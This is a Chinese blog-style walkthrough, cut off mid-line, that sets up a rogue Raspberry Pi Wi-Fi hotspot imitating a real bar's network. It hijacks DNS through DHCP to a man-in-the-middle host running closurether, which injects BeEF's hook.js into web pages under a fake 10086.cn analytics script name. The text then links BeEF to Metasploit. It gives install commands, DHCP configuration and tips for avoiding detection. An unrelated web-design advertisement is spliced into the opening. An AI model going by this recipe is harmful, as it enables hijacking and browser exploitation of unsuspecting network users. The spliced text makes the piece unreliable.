半个月前看了EtherDream写的那篇wifi流量劫持和JS投毒,随手就在公司实验室里折腾了一下,头一次接触这个领域,感觉挺新鲜的。然后又看到sh4dow@lcx.cc写了一篇《内网DNS投毒技术劫持会话》,我决定把我做的东西也分享一下。
十载的花垣网站建设经验,针对设计、前端、开发、售后、文案、推广等六对一服务,响应快,48小时及时工作处理。成都全网营销推广的优势是能够根据用户设备显示端的尺寸不同,自动调整花垣建站的显示方式,使网站能够适用不同显示终端,在浏览器中调整网站的宽度,无论在任何一种浏览器上浏览网站,都能展现优雅布局与设计,从而大程度地提升浏览体验。成都创新互联公司从事“花垣网站设计”,“花垣网站推广”以来,每个客户项目都认真落实执行。
0×01 攻击思路
1、用树莓派建立一个AP,诱使别人过来连接。
2、在树莓派里,设定DNS,指向一台代理主机(其实就是中间人)。
3、在代理主机上运行closurether,进行JS投毒。
4、投毒可以有很多种,closurether的原作者是设计了一个可以截获用户的登陆时候输入的用户名和密码,但是那个链接已经失效了,自己又不会写js,所以就改用别的思路。这里我选择了BeEF框架进行配合,在流量中插入hook.js。
5、既然BeEF可以配合MSF来攻击浏览器,那这里自然也少不了MSF的戏份。
0×02 工具准备
EDUP 迷你USB无线网卡 免驱动 (RTL8188CUS)
Raspberry Pi,系统镜像是Raspbian
团队的Summer建议我用TP-Link TL-WR703N 刷一个openWRT,便携而且还可以实现很多其他的功能。
这个想法还没有去尝试,openWRT刷进路由以后,路由就没有任何空间来安装其他的东西了。
0×03 改造树莓派
首先让树莓派运行起来,玩过的人都知道怎么弄,下载镜像,写入镜像,不做赘述。
其次是让树莓派作为一个路由器运行起来
详细的可以看这里:http://www.daveconroy.com/using-your-raspberry-pi-as-a-wireless-router-and-web-server/
这是使用树莓派建立无线AP的最早一篇文章。这里讲的非常详细,包括原理和具体配置都列举出来了,照着一步步坐下来,不会出太大意外。
这里伪造的wifi是我以前学调酒的那间酒吧用的,我师父是Lavazza的顶级咖啡师。不过那家酒吧关门了……在南京的童鞋如果有兴趣,还是有地方可以让我调酒的。
0×04建立中间人
在JS缓存投毒的文章中,作者给了非常详细的原理解释,并给出了实现代码。
我测试的平台是Mac OS X 10.0(黑苹果),安装简易,没有发生任何状况。
首先需要安装node.js
然后安装closurether
npm install -g closurether
运行closurether
closurether
closurether运行成功的话,就会看到下面的信息(linux下运行closurether需要的权限比较高,windows不能开启其他占用80、443端口的服务)
sudo closurether
Password:
[SYS] local ip: 172.16.6.37
[DNS] running 0.0.0.0:53
[WEB] listening 0.0.0.0:80
[WEB] listening 0.0.0.0:443
这个时候如果设置浏览器的代理指向127.0.0.1:80就可以看到closurether劫持的所有流量,包括DNS解析和http请求
如果你这么做了,不妨在浏览器中查看源码,你会看到源码中已经被植入了一个script标签,这个就是被closurether植入的攻击代码。
为了伪装,把地址写成了http://10086.cn/js10086/201306301200.js
但实际上,10086.cn上可不会有这么个文件….好一手栽赃嫁祸,我是伪装成了google-analytis的站点分析脚本
使用的攻击脚本和伪装都可以在config.json文件中修改
0×05修改DNS
依然已经准备了代理(中间人),那么就需要让流量指向代理,前面说设置浏览器代理可以实现,但最理想的还是作者提供的修改DNS
修改DNS,指向代理服务器,那么所有使用这个wifi上网的人解析域名就都解析到了代理服务器,DNS解析之后,再把http流量也指向代理服务器,就顺理成章的使closurether成为了中间人
在树莓派的DHCP中设置:
subnet 192.168.1.0 netmask 255.255.255.0 {
range 192.168.1.1 192.168.1.254;
option routers 192.168.1.1;
option domain-name-servers 172.16.6.37;
interface wlan0;
}
172.16.6.37也就是我本机
那么这个时候,连接到这个wifi的设备进行DNS解析的时候,得到的结果都是172.16.6.37
然后,其他的请求也就都指向了代理。
PS:closurether作者考虑的很周到,js投毒只能针对http或https协议,如果是其他的协议,那么在第二次请求的时候就把真实的DNS请求结果反馈给客户端,这样就不会那么容易被发现了。
0X06 BeEF和MSF
别人的文章里比我写的要清楚,就不多说了
但是目前关于BeEF使用的文章还比较少,还在陆续的挖掘其中的功能。
主要是需要建立BeEF和MSF的协作
使用
msfconsole -r beef.rc
来建立一个MSF的XMLRPC服务,然后BeEF启动以后会自动调用
beef.rc的内容如下:
load xmlrpc ServerHost=<服务器IP> Pass=<密码> ServerType=Web
0×07 把毒药撒向天空,让它随风飘扬(此处应有反派出场的音乐)
closurether中做如下修改:
修改asset/inject/extern.js,在function中增加:
- var commandModuleStr = '